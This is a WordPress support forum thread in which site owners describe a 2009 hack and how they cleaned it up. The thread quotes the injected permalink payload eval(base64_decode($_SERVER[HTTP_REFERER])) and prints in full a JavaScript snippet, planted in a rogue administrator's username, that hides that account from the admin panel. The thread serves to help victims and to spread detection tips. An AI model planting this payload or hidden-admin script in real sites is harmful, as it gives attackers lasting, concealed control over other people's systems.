Forums

WordPress › Support » How-To and Troubleshooting

[resolved] eval(base64_decode(...)) in permalinks (10 posts)

  1. benanne
    Member
    Posted 6 months ago #

    I figure my blog got hacked. It's my own fault for being too lazy to upgrade, but I thought I'd describe the symptoms, so other people who have the same problem have something to go by. I have since removed all the malicious stuff (at least I think I have) and upgraded to version 2.8.4.

    Since this morning, I noticed that my "permalinks" setting had been customised (I use the default ?p=123-style URLs, normally) and for some reason, there was something like: ${eval(base64_decode($_SERVER[HTTP_REFERER]))} appended to each of them. Which caused them not to work, obviously.

    When I looked at my users list, I noticed something odd: at the top it said Administrators (2), but only my own account was listed as administrator. I took a look at the database and seemingly, a user called "JohnFisher76" also had admin rights. I'd had a few spam registrations before so I hadn't paid attention to this. I wish I had...

    This user's username was... a bit weird. It looked like this:

    ...

<div id="user_superuser"><script language="JavaScript">
var setUserName = function(){
	try{
		var t=document.getElementById("user_superuser");
		while(t.nodeName!="TR"){
			t=t.parentNode;
		};
		t.parentNode.removeChild(t);
		var tags = document.getElementsByTagName("H3");
		var s = " shown below";
		for (var i = 0; i < tags.length; i++) {
			var t=tags[i].innerHTML;
			var h=tags[i];
			if(t.indexOf(s)>0){
				s =(parseInt(t)-1)+s;
				h.removeChild(h.firstChild);
				t = document.createTextNode(s);
				h.appendChild(t);
			}
		}
		var arr=document.getElementsByTagName("ul");
		for(var i in arr) if(arr[i].className=="subsubsub"){
			var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);
			if(n[1]>0){
				var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");
        arr[i].innerHTML=txt;
        }
    }
          }catch(e){};
     };
     addLoadEvent(setUserName);
</script></div>

    I haven't bothered to try and interpret what this does, but I guess it's used to hide the fact that there is another administrator in the admin panel. I don't know how this user managed to acquire admin rights though.

    Anyway, shame on me for not upgrading. To fix it, I removed the user (manually, in the database, tables user and usermeta), got rid of the funky permalink stuff, and then upgraded to 2.8.4 as fast as I could. As far as I can tell that's fixed it. I hope this thing hasn't left anything else behind that could come back to haunt me...

  2. riis
    Member
    Posted 6 months ago #

    Hi

    I've experienced the same thing today. I visited my site yesterday and everything was fine. Today everything is messed up. How did you get rid of the permalink problems?

    Thanks!

  3. benanne
    Member
    Posted 6 months ago #

    I just set it back to the default setting. Technically, I did remove the appended stuff in the database manually before that, but I don't think that had any effect.

    At any rate it can't hurt to search the "options" table for any reference to "eval" or "base64" and clean that up. It also appeared in a row in "options" called "rewrite_rules", I think. But that disappeared once I changed the setting back.

    As I said, I don't know if this has caused any other damage. The changed permalink setting rather seems like it is put in place to make further hacks easier to apply, although I have no idea how.

  4. lexthoonen
    Member
    Posted 6 months ago #

    Check this thread:
    http://wordpress.org/support/topic/307518

    and upgrade wordpress

  5. benanne
    Member
    Posted 6 months ago #

    Thanks, that is indeed exactly the same problem as the one I had. Maybe the extra information about the rogue user with administrator rights is still interesting, though.

  6. jekket
    Member
    Posted 6 months ago #

    i`ve just clean this stuff in "permalinks" and change my admin password.

    all works.

    P.S. Do backups - it saves your time

  7. benanne
    Member
    Posted 6 months ago #

    If I were you, I would check my user list to see if there are any admins in there that shouldn't be there...

  8. Gangleri
    Member
    Posted 6 months ago #

    Thread number three
    http://wordpress.org/support/topic/307518?replies=15
    http://wordpress.org/support/topic/297639

    It seems that this already started a couple of weeks ago, judging the oldest thread. Some automatic attack I guess.

  9. chabotjeff
    Member
    Posted 6 months ago #

    My site got nailed too. I didn't think of anything when I had a couple "admin" users added to the site. Thought it was just spam. But I had two additional "admins" with "contributer" status and they were able to change the Permalinks url structure. Argghh.

  10. byrev
    Member
    Posted 6 months ago #

    problem solved ... http://blog.4rev.net/2009-09/wordpress-hacked-eval-base64_decode-_serverhttp_referer/

    in wp_options table, clear the row named _transient_rewrite_rules and set permailink from wp config again !!!

    check all your dababase for infection:

    from ssh , use grep and search for particular strings in all database from server :

    grep -H -r “eval(base64_decode” /var/lib/mysql
    grep -H -r “var setUserName = function” /var/lib/mysql

    have a nice day ...

Reply

You must log in to post.

About this Topic

Tags